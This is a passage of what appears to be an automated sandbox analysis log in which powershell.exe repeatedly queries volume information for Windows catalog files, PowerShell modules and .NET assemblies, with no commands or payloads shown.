        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
